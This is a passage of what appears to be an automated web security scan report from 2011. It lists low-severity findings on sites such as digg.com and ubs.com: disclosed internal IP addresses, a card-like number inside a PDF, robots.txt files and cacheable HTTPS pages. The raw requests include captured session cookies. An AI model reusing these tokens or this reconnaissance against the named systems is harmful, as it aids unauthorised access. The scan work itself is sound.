Content-Type: text/html;charset=UTF-8
Content-Length: 8985

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.129.76 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

19.8. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.81

Request

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:17:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=33478 10.2.129.81
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8619

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.129.81 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

19.9. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.128.235

Request

Response

19.10. http://digg.com/topic previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/topic

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.226

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.11. http://digg.com/upcoming previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/upcoming

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.80

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20. Credit card numbers disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf

Issue detail

The following credit card number was disclosed in the response:

5560333389333556

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-length: 956266
content-type: application/pdf
date: Wed, 06 Jul 2011 14:08:14 GMT
etag: "e976a-4bbf4038"
last-modified: Fri, 09 Apr 2010 14:56:56 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

%PDF-1.4%....
106 0 obj<</Linearized 1/L 956266/O 108/E 562847/N 23/T 954103/H [ 816 1207]>>endobj xref106 260000000016 00000 n
0000002023 00000 n
0000002124 00000 n
0000002530 0
...[SNIP]...
56 556 556 556 556 556 556 0 556 556 278 278 0 0 0 0 0 667 556 0 0 500 444 722 0 222 0 0 0 889 0 722 0 0 0 0 500 0 611 944 0 611 0 0 0 0 0 0 0 500 556 444 556 500 333 556 556 222 0 500 222 833 556 556 556 0 333 389 333 556 444 778 444 444 444 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 278 556 556 0 0 1000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 800]/BaseFont/TKBRUF+Frutiger45Light/FirstChar 32/ToUnicode 54 0 R/En
...[SNIP]...

21. Robots.txt file previous next
There are 11 instances of this issue:

http://ad.doubleclick.net/adi/N3285.google/B2343920.122
http://api.twitter.com/receiver.html
http://cdn.stumble-upon.com/css/global_su.css
http://crl.globalsign.net/Root.crl
http://digg.com/submit
http://feeds.bbci.co.uk/news/rss.xml
http://googleads.g.doubleclick.net/pagead/ads
https://login.live.com/login.srf
https://manage.softlayer.com/Sales/orderComputingInstance
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://profile.live.com/badge/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

21.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Wed, 06 Jul 2011 11:55:06 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

21.2. http://api.twitter.com/receiver.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/receiver.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:02:31 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Tue, 05 Jul 2011 19:19:41 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Thu, 07 Jul 2011 14:02:31 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

21.3. http://cdn.stumble-upon.com/css/global_su.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.stumble-upon.com
Path:	/css/global_su.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: text/plain; charset=iso-8859-1
Date: Wed, 06 Jul 2011 11:15:25 GMT
Content-Length: 1962
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

21.4. http://crl.globalsign.net/Root.crl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://crl.globalsign.net
Path:	/Root.crl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: crl.globalsign.net

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (CentOS)
Last-Modified: Fri, 22 Jul 2005 09:01:45 GMT
ETag: "674e8a-1a-50aeb040"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Connection: close
Date: Sun, 03 Jul 2011 14:21:36 GMT
Content-Length: 26

User-agent: *
Disallow: /

21.5. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:14 GMT
Server: Apache
Last-Modified: Thu, 23 Jun 2011 20:57:55 GMT
Accept-Ranges: bytes
Content-Length: 599
Vary: Accept-Encoding
X-Digg-Time: D=357 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=9996
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...

21.6. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3600
Expires: Wed, 06 Jul 2011 12:54:38 GMT
Date: Wed, 06 Jul 2011 11:54:38 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

21.7. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Wed, 06 Jul 2011 11:55:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

21.8. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.live.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 02 Jun 2011 07:31:01 GMT
Accept-Ranges: bytes
ETag: "80a89b5f720cc1:0"
Server: Microsoft-IIS/7.5
PPServer: PPV: 30 H: BAYIDSLGN1E46 V: 0
Date: Wed, 06 Jul 2011 11:16:21 GMT
Connection: close
Content-Length: 27

User-agent: *
Disallow:

21.9. https://manage.softlayer.com/Sales/orderComputingInstance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/Sales/orderComputingInstance

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: manage.softlayer.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:14:57 GMT
Server: Apache
Last-Modified: Mon, 07 Jun 2010 19:32:00 GMT
ETag: "841612-13a-ba00ac00"
Accept-Ranges: bytes
Content-Length: 314
Connection: close
Content-Type: text/plain; charset=UTF-8

# Robots.txt file for http://manage.softlayer.com

User-agent: *
Disallow: /Security/
Disallow: /Hardware/
Disallow: /CloudLayer/
Disallow: /Software/
Disallow: /PublicNetwork/
Disallow: /PrivateNetwo
...[SNIP]...

21.10. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:12:05 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=85209961
Expires: Tue, 18 Mar 2014 17:20:38 GMT
Date: Wed, 06 Jul 2011 11:54:37 GMT
Connection: close

User-agent: *
Disallow: /

21.11. http://profile.live.com/badge/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/badge/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Imf: 74b7df7e-7559-4b4f-9f91-53867620c531
Set-Cookie: E=P:W4lGReUJzog=:sN3j/lWNTnsRNWsCRrbH2SJWjqKerDVbNW6RwFPo2Bw=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: sc_clustbl_142=1ab99405b8e49721; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:22 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC630 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Connection: close
Content-Length: 44

...User-agent: *
Disallow: /applications/

22. Cacheable HTTPS response previous next
There are 32 instances of this issue:

https://blog.metricstream.com/
https://clientlogin.ibb.ubs.com/AuthSSO/html/clientservices.html
https://clientlogin.ibb.ubs.com/AuthSSO/html/request_login.html
https://clientlogin.ibb.ubs.com/AuthSSO/html/securityguidelines.html
https://live.zune.net/xweb/passport/leftCB.aspx
https://login.live.com/pp1100/RDHelper_JS.srf
https://manage.softlayer.com/
https://manage.softlayer.com/Sales/orderComputingInstance
https://manage.softlayer.com/favicon.ico
https://manage.softlayer.com/index/index
https://nae.ubs.com/app/RKC/1/ACEUrlDispatcherWeb/Dispatch
https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch
https://nae.ubs.com/favicon.ico
https://onesource.ubs.com/
https://onlineservices.ubs.com/
https://onlineservices.ubs.com/favicon.ico
https://onlineservices.ubs.com/olsauth/ex/pbl/lo
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl
https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp
https://onlineservices.ubs.com/staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf
https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html
https://onlineservices.ubs.com/staticfiles/pws/adobe/StatementofFinancialCondition.pdf

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

22.1. https://blog.metricstream.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blog.metricstream.com
Path:	/

Request

Response

22.2. https://clientlogin.ibb.ubs.com/AuthSSO/html/clientservices.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://clientlogin.ibb.ubs.com
Path:	/AuthSSO/html/clientservices.html

Request

GET /AuthSSO/html/clientservices.html HTTP/1.1
Host: clientlogin.ibb.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 06 Jul 2011 14:09:18 GMT
Server: Apache
Last-Modified: Sat, 19 Feb 2011 09:39:49 GMT
ETag: "c4a140-ee9-49c9f69680340"
Accept-Ranges: bytes
Content-Length: 3817
P3P: CP="OTI DSP COR BUS CUR OUR"
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

22.3. https://clientlogin.ibb.ubs.com/AuthSSO/html/request_login.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://clientlogin.ibb.ubs.com
Path:	/AuthSSO/html/request_login.html

Request

GET /AuthSSO/html/request_login.html HTTP/1.1
Host: clientlogin.ibb.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 06 Jul 2011 14:09:17 GMT
Server: Apache
Last-Modified: Sat, 19 Feb 2011 09:39:50 GMT
ETag: "c4a114-11b9-49c9f69774580"
Accept-Ranges: bytes
Content-Length: 4537
P3P: CP="OTI DSP COR BUS CUR OUR"
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

22.4. https://clientlogin.ibb.ubs.com/AuthSSO/html/securityguidelines.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://clientlogin.ibb.ubs.com
Path:	/AuthSSO/html/securityguidelines.html

Request

GET /AuthSSO/html/securityguidelines.html?_URI=aHR0cDovL2NsaWVudHBvcnRhbC5pYmIudWJzLmNvbS9wb3J0YWwvaW5kZXguaHRtP3BhZ2U9aG9tZQ== HTTP/1.1
Host: clientlogin.ibb.ubs.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981879305:ss=1309981804815

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:52:02 GMT
Server: Apache
Last-Modified: Mon, 21 Jun 2010 19:09:22 GMT
ETag: "b47924-2c7c-4898f0ad67c80"
Accept-Ranges: bytes
Content-Length: 11388
P3P: CP="OTI DSP COR BUS CUR OUR"
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

22.5. https://live.zune.net/xweb/passport/leftCB.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://live.zune.net
Path:	/xweb/passport/leftCB.aspx

Request

GET /xweb/passport/leftCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 14:09:00 GMT
Last-Modified: Wed, 06 Jul 2011 14:09:00 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S802
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:59 GMT
Connection: close
Content-Length: 5090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta name="ROBOTS" co
...[SNIP]...

22.6. https://login.live.com/pp1100/RDHelper_JS.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/pp1100/RDHelper_JS.srf

Request

GET /pp1100/RDHelper_JS.srf?x=11.0.18163.0&lc=1033 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1; MSPRequ=lt=1309951118&id=75046&co=1; MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69; CkTst=G1309951121051

Response

HTTP/1.1 200 OK
Content-Length: 9536
Content-Type: text/html; charset=utf-8
Expires: Mon, 04 Jul 2016 11:20:54 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
PPServer: PPV: 30 H: BAYIDSLGN1E35 V: 0
Date: Wed, 06 Jul 2011 11:20:54 GMT
Connection: close


var k_fRealmNone=0,k_fRealmAllowWLIDSignIn=1<<0,k_fRealmAllowFedSignIn=1<<1,k_fRealmConflictInactive=1<<2,k_fRealmConfl
...[SNIP]...

22.7. https://manage.softlayer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/

Request

GET / HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.8. https://manage.softlayer.com/Sales/orderComputingInstance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/Sales/orderComputingInstance

Request

Response

22.9. https://manage.softlayer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: manage.softlayer.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1306442258.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-1683070318-1308913155755; _mkto_trk=id:220-ESA-932&token:_mch-softlayer.com-1306437485169-98953; __utma=1.1168266774.1306437626.1306442258.1308913135.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:01 GMT
Server: Apache
Last-Modified: Tue, 02 Jun 2009 16:03:46 GMT
ETag: "84058b-e36-b0049c80"
Accept-Ranges: bytes
Content-Length: 3638
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding

..............h...&... ..............(....... ...........@...................................558............. .......0/3.............325.........................326...................................
...[SNIP]...

22.10. https://manage.softlayer.com/index/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/index/index

Request

GET /index/index HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.11. https://nae.ubs.com/app/RKC/1/ACEUrlDispatcherWeb/Dispatch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://nae.ubs.com
Path:	/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

Request

GET /app/RKC/1/ACEUrlDispatcherWeb/Dispatch HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html; charset=UTF-8
age: 2
date: Wed, 06 Jul 2011 14:08:23 GMT
content-length: 5743
content-language: en
server: Proxy/1.0
connection: close
x-old-content-length: 5743

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>UBS Login</title>

<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

22.12. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://nae.ubs.com
Path:	/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

Request

GET /cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instruments?locale=en_US HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
Referer: https://nae.ubs.com/quotes/markets_instruments?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com; PD-S-SESSION-ID=2_A7C3ZebL4esSGqSbaud57OPM7IqEBzFS2x-d1D1jkPtQxo0g

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html; charset=UTF-8
date: Wed, 06 Jul 2011 13:54:58 GMT
content-language: en
server: Proxy/1.0
x-old-content-length: 5927
Content-Length: 5927

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>UBS Login</title>

<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

22.13. https://nae.ubs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://nae.ubs.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com; PD-S-SESSION-ID=2_A7C3ZebL4esSGqSbaud57OPM7IqEBzFS2x-d1D1jkPtQxo0g

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/plain
date: Wed, 06 Jul 2011 13:54:58 GMT
content-length: 224
last-modified: Thu, 10 Aug 2006 11:13:01 GMT

GIF89a.......___..................OOO......ooo///...???...................................................!.......,..........]`$.di.h....8...A$...4..A....0.x.........o... .(.rX."..B.t....1RX...G-1.
...[SNIP]...

22.14. https://onesource.ubs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onesource.ubs.com
Path:	/

Request

GET / HTTP/1.1
Host: onesource.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Wed, 06 Jul 2011 14:08:16 GMT
Content-length: 10173
Content-type: text/html
Etag: "94d76da3-3-0-27bd"
Last-modified: Sun, 19 Jun 2011 19:32:07 GMT
Accept-ranges: bytes
Connection: close


<HTML>
